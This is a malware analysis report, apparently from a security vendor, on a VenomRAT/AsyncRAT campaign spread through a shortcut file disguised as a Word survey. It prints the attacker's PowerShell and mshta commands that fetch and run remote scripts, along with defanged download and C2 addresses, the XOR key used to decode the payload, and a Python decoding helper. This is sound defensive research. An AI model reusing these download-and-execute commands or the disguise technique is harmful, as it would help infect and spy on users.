Distribution of VenomRAT (AsyncRAT) Impersonating Korean IT Companies
AhnLab SEcurity intelligence Center (ASEC) found a shortcut file (.lnk) that downloads AsyncRAT (VenomRAT). In order for the LNK file to disguise itself as a legitimate Word file, it was distributed with the name ‘Survey.docx.lnk’ inside a compressed file which also contained a legitimate text file. Above all, users need to remain vigilant, as the executable file (blues.exe) used in the attack is disguised as a Korean company’s certificate.
The overall operation process of the malware is as shown below.

The compressed file is disguised as a ‘survey’ to encourage users to open it. It includes a text file and the malicious LNK file. The text file contains instructions that guide users to execute the malicious LNK file.

The LNK file contains a malicious command. When the file is executed, PowerShell launches mshta, which connects to an external URL and runs the additional script hosted there.

- Execution command
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe . $env:C:\W*\S*2\m*h?a.* ‘hxxp://194.33.191[.]248:7287/docx1.hta’
The HTA file at hxxp://194.33.191[.]248:7287/docx1.hta contains obfuscated strings that decode to a PowerShell command. As shown in Figure 5, this command downloads additional files, saves them in the %appdata% folder, and then executes them.
- Download URL
hxxp://194.33.191[.]248:7287/qfqe.docx
hxxp://194.33.191[.]248:7287/blues.exe


The downloaded qfqe.docx file is a legitimate Word document that contains survey information, which makes it hard for users to notice any malicious activities.

The blues.exe file that is downloaded with the Word file is a downloader-type malware disguised as a Korean IT company’s certificate. When executed, it downloads additional scripts through PowerShell.


- Execution command
powershell iwr hxxp://194.33.191[.]248:7287/sys.ps1 -UseBasicParsing | iex
The sys.ps1 script run by blues.exe, as shown above, is also a downloader: it fetches additional data from hxxp://194.33.191[.]248:7287/adb.dll and executes it in memory without writing it to disk (fileless execution).

adb.dll contains an encoded shellcode. It is decoded by Base64-decoding the blob and then XORing the result with the string ‘sorootktools’.
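The decoding step described above, written out as an added analysis helper that is not part of the original post: it Base64-decodes a blob and XORs it with the repeating key ‘sorootktools’ named on the page. The sample blob below is constructed here for the round-trip check and is not taken from adb.dll.

```python
import base64
from itertools import cycle

# Key the page reports being XORed against the Base64-decoded blob in adb.dll
XOR_KEY = b"sorootktools"


def xor_with_key(data: bytes, key: bytes = XOR_KEY) -> bytes:
    """XOR every byte of data with the repeating key (symmetric: encodes and decodes)."""
    return bytes(b ^ k for b, k in zip(data, cycle(key)))


def decode_adb_payload(encoded: str, key: bytes = XOR_KEY) -> bytes:
    """Recover the shellcode bytes from the Base64 text carried in adb.dll.

    Step 1: Base64-decode the ASCII blob; whitespace and line breaks that
            commonly survive extraction from a .NET binary are stripped first.
    Step 2: XOR the decoded bytes with the repeating key.
    """
    raw = base64.b64decode("".join(encoded.split()), validate=True)
    return xor_with_key(raw, key)


def encode_like_adb(plain: bytes, key: bytes = XOR_KEY) -> str:
    """Inverse transform; used here only to build a labelled test blob."""
    return base64.b64encode(xor_with_key(plain, key)).decode("ascii")


# Constructed placeholder, NOT real shellcode: exercises the full round trip.
SAMPLE_PLAIN = b"CONSTRUCTED SAMPLE BYTES - NOT REAL SHELLCODE"
SAMPLE_BLOB = encode_like_adb(SAMPLE_PLAIN)


def decode_sample() -> bytes:
    """Decode the constructed blob exactly as an analyst would decode adb.dll's."""
    return decode_adb_payload(SAMPLE_BLOB)


if __name__ == "__main__":
    # Hand an analyst a hex preview of the recovered buffer instead of executing it.
    recovered = decode_sample()
    print(f"decoded {len(recovered)} bytes: {recovered[:16].hex()} ...")
```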

The shellcode that is ultimately executed is the RAT-type malware VenomRAT (AsyncRAT), which performs keylogging and exfiltrates information about the user’s PC. It can also carry out various other malicious actions on commands received from the threat actor.
- C2 : 194.33.191[.]248:4449

Malicious shortcut files disguised as legitimate documents continue to be distributed. Because Windows does not display the ‘.lnk’ extension in file names, users can easily mistake such a shortcut for a normal document. Particular caution is therefore advised.
[File Detection]
Trojan/LNK.Runner (2024.01.16.00)
Trojan/HTML.Agent.SC196238 (2024.01.17.00)
Trojan/Win.Generic.C5572807 (2024.01.12.03)
Trojan/PowerShell.Agent (2024.01.17.00)
Trojan/Win.Generic.C5337844 (2022.12.21.00)
[Behavior Detection]
Execution/MDP.Powershell.M2514